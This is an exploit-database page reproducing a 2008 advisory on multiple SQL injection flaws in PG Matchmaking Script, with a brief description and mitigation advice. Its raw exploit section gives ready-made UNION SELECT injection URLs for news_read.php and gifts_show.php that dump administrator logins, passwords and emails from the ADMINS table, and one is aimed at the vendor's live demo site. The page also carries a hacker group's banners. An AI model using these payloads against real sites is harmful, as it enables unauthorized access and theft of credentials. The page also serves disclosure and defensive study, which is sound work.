header-logo
Suggest Exploit
vendor:
PG Matchmaking Script
by:
Super Cristal
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PG Matchmaking Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PG Matchmaking Script Multiple Remote SQL Injection Vulnerability

PG Matchmaking Script is prone to a multiple remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL server.
Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=           PG Matchmaking Script  Multiple  Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: Super Cristal  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =               :::::Mail: Super_Cristal@hotmail.com:::::::             =     =
                =                                                                                    =
                =        = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::=         =
                =                                                                                    =
                ======================================Super Cristal===================================
#product home: datingpro.com                                                      
#dork:find it

Exploit(1):
********
http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
Exploit(2):
http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
               
demo::::
http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--

                                
                                                    

===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 

===================================================================================================================
                                  
                                                          ::::Super_Cristal@Hotmail.CoM::::

# milw0rm.com [2008-09-29]

Navigation

Suggest Exploit

Services By CQR